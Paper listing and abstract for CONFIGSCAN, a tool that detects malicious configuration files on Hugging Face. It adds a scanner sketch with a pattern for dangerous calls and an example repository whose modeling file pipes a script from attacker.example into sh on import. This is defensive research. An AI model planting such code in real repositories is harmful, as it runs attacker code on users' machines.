🤖 AI Summary
This work addresses the security risk of malicious code execution via compromised configuration files on AI model hosting platforms (e.g., Hugging Face). We first establish a formal threat model for configuration files, systematically identifying three attack vectors: file tampering, website hijacking, and repository-level manipulation. To detect such threats, we propose CONFIGSCAN, the first framework for joint configuration-code analysis, which integrates LLM-driven static semantic parsing, runtime dependency modeling, and behavior inference for critical libraries. This design preserves contextual awareness while substantially reducing false positives. Evaluated on Hugging Face, CONFIGSCAN achieves >92% detection accuracy with a <1.3% false positive rate, identifying thousands of high-risk configurations and repositories. Our approach advances standardized security assessment of the AI model supply chain.
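The paper's implementation is not reproduced here, but a joint configuration-code analysis in the spirit of CONFIGSCAN might be organized as the sketch below: locate the config fields that reference executable code, pull in the referenced runtime source, and judge the pair together. All function names, the field list, and the pattern-based stand-in for the LLM judgment step are assumptions for illustration, not the authors' code.

```python
import json
import re
from pathlib import Path

# Config fields that can reference executable code in a Hugging Face
# repository (an illustrative assumption; the paper's field list may differ).
CODE_REFERENCING_FIELDS = ("auto_map", "custom_pipelines")

def referenced_modules(config: dict) -> list[str]:
    """Collect the Python source files that the config points at."""
    modules = []
    for field in CODE_REFERENCING_FIELDS:
        mapping = config.get(field, {})
        for target in mapping.values():
            # Entries look like "modeling_custom.CustomModel".
            if isinstance(target, str):
                modules.append(target.split(".")[0] + ".py")
    return modules

def judge_with_context(config: dict, module_source: str) -> bool:
    """Stand-in for CONFIGSCAN's LLM judgment step, which prompts an LLM
    with the config, the referenced runtime code, and behavior summaries
    of the critical libraries it imports. A crude pattern check substitutes
    for that call here so the sketch runs offline."""
    return re.search(r"os\.system|subprocess|eval\(|exec\(", module_source) is not None

def scan_repository(repo_dir: str) -> list[str]:
    """Flag code files referenced by the repo's config that look malicious."""
    repo = Path(repo_dir)
    config = json.loads((repo / "config.json").read_text())
    flagged = []
    for module in referenced_modules(config):
        source_file = repo / module
        if source_file.exists() and judge_with_context(config, source_file.read_text()):
            flagged.append(module)
    return flagged

if __name__ == "__main__":
    print(scan_repository("./downloaded_repo"))  # hypothetical local checkout
```

The key design point the summary highlights is that the config and the code it references are analyzed together, so a scanner can tell a benign custom model file apart from one that a tampered config quietly routes execution into.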
📝 Abstract
Recent advancements in large language models (LLMs) have spurred the development of diverse AI applications, from code generation and video editing to text generation. However, AI supply chains such as Hugging Face, which host pretrained models and their associated configuration files contributed by the public, face significant security challenges. In particular, configuration files, originally intended to set up models by specifying parameters and initial settings, can be exploited to execute unauthorized code, yet research has largely overlooked their security compared to that of the models themselves. In this work, we present the first comprehensive study of malicious configurations on Hugging Face, identifying three attack scenarios (file, website, and repository operations) that expose inherent risks. To address these threats, we introduce CONFIGSCAN, an LLM-based tool that analyzes configuration files in the context of their associated runtime code and critical libraries, effectively detecting suspicious elements with low false positive rates and high accuracy. Our extensive evaluation uncovers thousands of suspicious repositories and configuration files, underscoring the urgent need for enhanced security validation in AI model hosting platforms.
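To make the mechanism concrete, the sketch below shows how a configuration file can trigger code execution through the standard `trust_remote_code` loading path in `transformers`. The repository name, file names, and payload are hypothetical; this illustrates the general risk rather than the specific attack scenarios the paper studies.

```python
# --- config.json in a hypothetical malicious repository ---
# The "auto_map" field is a legitimate customization feature: it points
# transformers at Python files inside the repo that implement the model.
#
#   {
#     "architectures": ["CustomModel"],
#     "auto_map": {
#       "AutoConfig": "configuration_custom.CustomConfig",
#       "AutoModel": "modeling_custom.CustomModel"
#     }
#   }

# --- modeling_custom.py in the same repository ---
# Any top-level statement runs at import time, before any model is built.
import os
os.system("curl -s https://attacker.example/payload.sh | sh")  # hypothetical payload

# --- on the victim's machine ---
# One standard loading call is enough: trust_remote_code=True makes
# transformers download and import modeling_custom.py, which runs the
# top-level payload above.
from transformers import AutoModel
model = AutoModel.from_pretrained("user/hypothetical-repo", trust_remote_code=True)
```

Because the pointer to the executable file lives in the configuration rather than in the model weights, scanners that inspect only serialized models miss it, which is the gap the paper targets.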